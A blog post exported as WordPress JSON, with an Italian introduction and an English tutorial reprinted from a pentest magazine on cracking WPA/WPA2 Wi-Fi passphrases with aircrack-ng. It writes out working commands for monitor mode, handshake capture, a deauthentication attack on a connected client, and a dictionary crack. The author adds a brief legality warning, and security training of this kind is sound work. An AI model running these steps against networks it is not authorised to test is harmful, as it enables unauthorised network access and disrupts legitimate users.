{"id":229,"date":"2013-01-09T01:27:58","date_gmt":"2013-01-09T00:27:58","guid":{"rendered":"http:\/\/under12oot.noblogs.org\/?p=229"},"modified":"2014-01-30T16:16:42","modified_gmt":"2014-01-30T15:16:42","slug":"crack-wpa-wpa2-with-aircrack-ng","status":"publish","type":"post","link":"https:\/\/under12oot.noblogs.org\/?p=229","title":{"rendered":"Crack Wpa-wpa2 with aircrack-ng"},"content":{"rendered":"<p>Voglio riproporvi 1 dei 2 articoli che qualche mese fa ho scritto per <em>pentest magazine, <\/em>una rivista che tratta argomenti (come suggerisce il nome) sui test di penetrazione. L&#8217;articolo \u00e8 scritto in un inglese molto semplice e le immagini lasciano poco spazio all&#8217;interpretazione, insomma non ci si pu\u00f2 sbagliare : ] La distro che ho utilizzato \u00e8 backbox (c&#8217;\u00e8 il link a destra) ma quel che serve in realt\u00e0 \u00e8 solamente la suite di aircrack-ng.<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h5 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>In this article we show you how to crack wpa wireless passphrase with BackBox 2.05<\/b><\/span><\/span><\/span><\/h5>\n<p>&nbsp;<\/p>\n<h6 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>What you will learn&#8230;<\/b><\/span><\/span><\/span><\/h6>\n<ul>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to capture handshake <\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to deauthenticate client if needed<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to crack passphrase with aircrack-ng <\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<h6 align=\"LEFT\"><\/h6>\n<h6 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>What you should know&#8230;<\/b><\/span><\/span><\/span><\/h6>\n<ul>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you have to know (read you MUST know) how to move on Linux system, basic command, for example move trought the Directory, copy\/past\/remove file or dir<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you have to know (at least the base) how to work aircrack-ng, aireplay-ng, airodump-ng and their options<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: x-large\"><b>Choose tagert!<\/b><\/span><\/span><\/span><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><i>Little note<\/i>: crack password and penetrate inside not own network is an illegale task. Keep in mind to test security of your own network!<\/span><\/span><\/span><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">In this step we put our wireless card in monitor mode, to do that open terminal and type:<\/span><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">sudo airmon-ng start wlan0<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_230\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1_airmon.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-230\" class=\"size-medium wp-image-230   \" alt=\"monitor mode\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1_airmon-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1_airmon-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1_airmon-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1_airmon.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-230\" class=\"wp-caption-text\">monitor mode<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Now we need to start a session of airodump-ng so we can choose appropriate wpa and other useful info: <\/span><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">sudo airodump-ng mon0<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_231\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2_airodump.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-231\" class=\"size-medium wp-image-231  \" alt=\"airodump\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2_airodump-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2_airodump-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2_airodump-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2_airodump.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-231\" class=\"wp-caption-text\">airodump<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">this step can be done also with: <\/span><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">sudo iwlist wlan0 scan<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_232\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3_iwlist.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-232\" class=\"size-medium wp-image-232  \" alt=\"scansione reti iwlist\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3_iwlist-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3_iwlist-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3_iwlist-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3_iwlist.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-232\" class=\"wp-caption-text\">scansione reti iwlist<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_233\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4_macdump.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-233\" class=\"size-medium wp-image-233  \" alt=\"info con airodump\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4_macdump-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4_macdump-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4_macdump-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4_macdump.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-233\" class=\"wp-caption-text\">info con airodump<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">this step give us needed info like: essid (network name), bssid (mac address Access Point), client (mac address client) and channel of the network. Now we can start airodump-ng session with appropriate option: <span style=\"text-decoration: underline\">sudo airodump-ng \u2013bssid $macadap \u2013channel $AP -w $file $int\u00a0 <\/span> for my test: <span style=\"text-decoration: underline\">sudo airodump-ng \u2013bssid 4C:54:99:6E:39:F9 \u2013channel 11 -w testwpa mon0<\/span><\/span><\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_234\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5_airodumpclient.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-234\" class=\"size-medium wp-image-234  \" alt=\"client connessi\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5_airodumpclient-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5_airodumpclient-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5_airodumpclient-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5_airodumpclient.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-234\" class=\"wp-caption-text\">client connessi<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">where :<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">&#8211;bssid: mac address access point<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">&#8211;channel: access point channel<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-w: write dump into a file (testwpa)<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">mon0: interface in monitor mode<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Now we have to wait someone who connect at AP, but we can also deauthenticate connected client to enforce it to reconnect. To do that we use aireplay-ng: <span style=\"text-decoration: underline\">sudo aireplay-ng -0 15 -a $macAP -c $macCLIENT $int<\/span> for my test: <span style=\"text-decoration: underline\">sudo aireplay-ng -0 15 -a 4C:54:99:6E:39:F9 -c 00:25:D3:D7:05:7C mon0<\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_236\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7_hadshack.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-236\" class=\"size-medium wp-image-236  \" alt=\"cattura handshake\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7_hadshack-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7_hadshack-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7_hadshack-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7_hadshack.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-236\" class=\"wp-caption-text\">cattura handshake<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">where:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-0: option&#8217;s aireplay for deauthenticaton attack<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">15: number of deauthentication packet to send<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-a: mac address access point<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-c: mac address connected client<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">mon0: interface in monitor mode<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">As you can see on image, we have detect wpa handshake. The last thing to do, is try to crack passphrase with aircrack and an appropriate wordlist: <span style=\"text-decoration: underline\">sudo aircrack-ng -b $macaddAP -w $wordlist $savedwpa.cap<\/span> for my test: <span style=\"text-decoration: underline\">sudo aircrack-ng -b 4C:54:99:6E:39:F9 -w wlist.txt testwpa.cap<\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_237\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/8_keyfound.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-237\" class=\"size-medium wp-image-237  \" alt=\"ok chiave trovata ;)\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/8_keyfound-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/8_keyfound-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/8_keyfound-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/8_keyfound.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-237\" class=\"wp-caption-text\">ok chiave trovata \ud83d\ude09<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">where:<\/span><\/span><\/span><\/p>\n<ul>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-b: mac address access point<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">-w: worlist path <\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">testwpa.cap: is the file which contain hadshake saved by airodump-ng<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<p lang=\"it-IT\" align=\"LEFT\"><em><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">That&#8217;s all folks!!! Thanx again to all Bbox community!! <\/span><\/span><\/span><\/em><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><em>Stay united stay hack!! happy hacking &amp;&amp; GoVEGetarian<\/em><br \/>\n<\/span><\/span><\/span><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><em>Noyse_dog<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Voglio riproporvi 1 dei 2 articoli che qualche mese fa ho scritto per pentest magazine, una rivista che tratta argomenti (come suggerisce il nome) sui test di penetrazione. L&#8217;articolo \u00e8 scritto in un inglese molto semplice e le immagini lasciano poco spazio all&#8217;interpretazione, insomma non ci si pu\u00f2 sbagliare : ] La distro che ho [&hellip;]<\/p>\n","protected":false},"author":5820,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[31,34,33,32],"class_list":["post-229","post","type-post","status-publish","format-standard","hentry","category-howto","tag-aircrack","tag-crack-passphrase","tag-hack-wpa","tag-wpa-crack"],"_links":{"self":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/users\/5820"}],"replies":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=229"}],"version-history":[{"count":12,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions"}],"predecessor-version":[{"id":627,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions\/627"}],"wp:attachment":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=229"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}